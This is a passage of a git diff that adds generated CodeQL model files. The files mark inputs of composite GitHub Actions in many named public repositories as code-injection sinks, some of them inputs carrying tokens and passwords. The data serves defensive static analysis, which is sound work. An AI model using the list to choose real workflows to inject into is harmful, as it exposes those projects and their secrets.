+extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dnsjava/dnsjava", "*", "inputs.name", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "inputs.filename", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml new file mode 100644 index 000000000000..e26ba9755d04 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dotintent/react-native-ble-plx", "*", "inputs.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml new file mode 100644 index 000000000000..2cda1936f016 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dotnet/docs-tools", "*", "inputs.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml new file mode 100644 index 000000000000..f83cf533944e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dotnet/dotnet-monitor", "*", "inputs.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml new file mode 100644 index 000000000000..5af04ac6ac70 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dragonflydb/dragonfly", "*", "inputs.gspace-secret", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "inputs.filter", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "inputs.dfly-executable", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "inputs.build-folder-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml new file mode 100644 index 000000000000..0d0cae87e09d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eksctl-io/eksctl", "*", "inputs.token", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "inputs.email", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml new file mode 100644 index 000000000000..070b502e1889 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elastic/apm-agent-dotnet", "*", "inputs.project", "code-injection", "generated"] + - ["elastic/apm-agent-dotnet", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml new file mode 100644 index 000000000000..6c0cf90523ac --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elastic/apm-agent-java", "*", "inputs.tag", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.path", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.name", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.test-java-version", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml new file mode 100644 index 000000000000..ca6459221d4b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["elementor/elementor", "*", "inputs.README_TXT_PATH", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.CHANNEL", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.PACKAGE_VERSION", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.MESSAGE", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.SLACK_TOKEN", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.SLACK_CHANNELS", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.PRERELEASE", "code-injection", "generated"] + - ["elementor/elementor", "*", "inputs.TAG_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml new file mode 100644 index 000000000000..79d14b65bccc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["emberjs/data", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml new file mode 100644 index 000000000000..69771693787d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["emqx/emqx", "*", "inputs.profile", "code-injection", "generated"] + - ["emqx/emqx", "*", "inputs.otp", "code-injection", "generated"] + - ["emqx/emqx", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml new file mode 100644 index 000000000000..a5a3cfbb1c99 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["eonasdan/tempus-dominus", "*", "inputs.VERSION", "code-injection", "generated"] + - ["eonasdan/tempus-dominus", "*", "inputs.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml new file mode 100644 index 000000000000..2000f5d9d00c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["erlang/otp", "*", "inputs.TYPE", "code-injection", "generated"] + - ["erlang/otp", "*", "inputs.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml new file mode 100644 index 000000000000..95164c659ed5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["esphome/esphome", "*", "inputs.target", "code-injection", "generated"] + - ["esphome/esphome", "*", "inputs.suffix", "code-injection", "generated"] + - ["esphome/esphome", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml new file mode 100644 index 000000000000..7e3b5e4caf60 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expensify/app", "*", "inputs.GPG_PASSPHRASE", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD_EMAIL", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_SECRET", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_ID", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.PATH_ENV_FILE", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.MAPBOX_SDK_DOWNLOAD_TOKEN", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml new file mode 100644 index 000000000000..f335170dc854 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expo/expo", "*", "inputs.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml new file mode 100644 index 000000000000..555fa42a79cc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expo/vscode-expo", "*", "inputs.command", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "inputs.semver", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml new file mode 100644 index 000000000000..8fd9440729f6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["external-secrets/external-secrets", "*", "inputs.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets", "*", "inputs.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml new file mode 100644 index 000000000000..f9479e11aabf --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/buck2", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml new file mode 100644 index 000000000000..711eabc2bfa5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/flow", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml new file mode 100644 index 000000000000..745f89d8677b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/yoga", "*", "inputs.version", "code-injection", "generated"] + - ["facebook/yoga", "*", "inputs.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml new file mode 100644 index 000000000000..a732e2fac3f0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebookresearch/xformers", "*", "inputs.arch", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.pytorch_channel", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.pytorch_version", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.python", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.cuda", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml new file mode 100644 index 000000000000..1aebd1199a5a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fastly/compute-actions", "*", "inputs.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml new file mode 100644 index 000000000000..708adf528f29 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["felangel/bloc", "*", "inputs.coverage_excludes", "code-injection", "generated"] + - ["felangel/bloc", "*", "inputs.analyze_directories", "code-injection", "generated"] + - ["felangel/bloc", "*", "inputs.report_on", "code-injection", "generated"] + - ["felangel/bloc", "*", "inputs.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml new file mode 100644 index 000000000000..18c02da44431 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["firebase/firebase-ios-sdk", "*", "inputs.min-ios-version", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "inputs.sources", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "inputs.pods", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "inputs.notices-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml new file mode 100644 index 000000000000..c0a44fae7498 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flaxengine/flaxengine", "*", "inputs.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml new file mode 100644 index 000000000000..af0f474bfaef --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-version", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-target", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-api", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-api-token", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml new file mode 100644 index 000000000000..731ecd5ab1be --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fluxcd/flux2", "*", "inputs.bindir", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "inputs.token", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml new file mode 100644 index 000000000000..ca4dc84bbfc2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["forcedotcom/salesforcedx-vscode", "*", "inputs.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml new file mode 100644 index 000000000000..caa6432efa9e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fossasia/visdom", "*", "inputs.loadprbuild", "code-injection", "generated"] + - ["fossasia/visdom", "*", "inputs.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml new file mode 100644 index 000000000000..a2e78841f692 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["freckle/stack-action", "*", "inputs.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml new file mode 100644 index 000000000000..fbb76ae46e88 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["freeradius/freeradius-server", "*", "inputs.gcc_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "inputs.llvm_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "inputs.sql_mysql_test_server", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml new file mode 100644 index 000000000000..23d001db673e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gaphor/gaphor", "*", "inputs.version", "code-injection", "generated"] + - ["gaphor/gaphor", "*", "inputs.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml new file mode 100644 index 000000000000..94c7adf250af --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getsentry/action-release", "*", "inputs.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml new file mode 100644 index 000000000000..85632a06a75b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["github/codeql-action", "*", "inputs.latest_tag", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.major_version", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.version", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.use-all-platform-bundle", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.expected-config-file-contents", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml new file mode 100644 index 000000000000..9f002168214b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["github/ruby", "*", "inputs.builddir", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.srcdir", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.test-opts", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.report-path", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml new file mode 100644 index 000000000000..f1191e5c1c6d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gittools/gitversion", "*", "inputs.distro", "code-injection", "generated"] + - ["gittools/gitversion", "*", "inputs.targetFramework", "code-injection", "generated"] + - ["gittools/gitversion", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml new file mode 100644 index 000000000000..b0e30669c2ec --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["go-spatial/tegola", "*", "inputs.artifact_name", "code-injection", "generated"] + - ["go-spatial/tegola", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml new file mode 100644 index 000000000000..e26f0a886d91 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["goauthentik/authentik", "*", "inputs.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml new file mode 100644 index 000000000000..4b40b2fda8a5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["godotengine/godot", "*", "inputs.bin", "code-injection", "generated"] + - ["godotengine/godot", "*", "inputs.tests", "code-injection", "generated"] + - ["godotengine/godot", "*", "inputs.target", "code-injection", "generated"] + - ["godotengine/godot", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml new file mode 100644 index 000000000000..06b6e37ea1c7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["google/dagger", "*", "inputs.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml new file mode 100644 index 000000000000..dab53d9d5a37 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googleapis/java-cloud-bom", "*", "inputs.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml new file mode 100644 index 000000000000..ce485e688f25 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googleapis/sdk-platform-java", "*", "inputs.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml new file mode 100644 index 000000000000..82d69349e3ae --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml new file mode 100644 index 000000000000..13a6bfe9233a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gravitational/teleport", "*", "inputs.target", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.attempts", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.flags", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.path", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.bin", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml new file mode 100644 index 000000000000..163abb261858 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["grote/transportr", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml new file mode 100644 index 000000000000..3be0de433299 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/nomad", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml new file mode 100644 index 000000000000..2b0b84e172bf --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform", "*", "inputs.target-terraform-branch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-terraform-version", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-arch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-os", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-equivalence-test-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml new file mode 100644 index 000000000000..bcd6e0eda315 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/vault", "*", "inputs.destination", 